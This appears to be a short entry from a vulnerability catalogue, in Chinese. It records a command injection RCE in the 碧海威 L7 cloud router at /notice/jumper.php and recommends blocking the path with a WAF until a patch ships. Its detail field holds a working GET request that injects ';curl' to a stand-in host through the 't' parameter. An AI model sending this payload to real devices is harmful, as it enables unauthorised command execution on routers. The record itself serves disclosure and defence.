vendor = "碧海威"
name = "碧海威 L7 云路由无线运营版 confirm.php/jumper.php命令注入漏洞"
type = "RCE"
version = "未知"
path = "/notice/jumper.php"
detail = "GET /notice/jumper.php?t=;curl%20http%3A%2F%2Fexample%2Ecom%2F HTTP/1.1"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
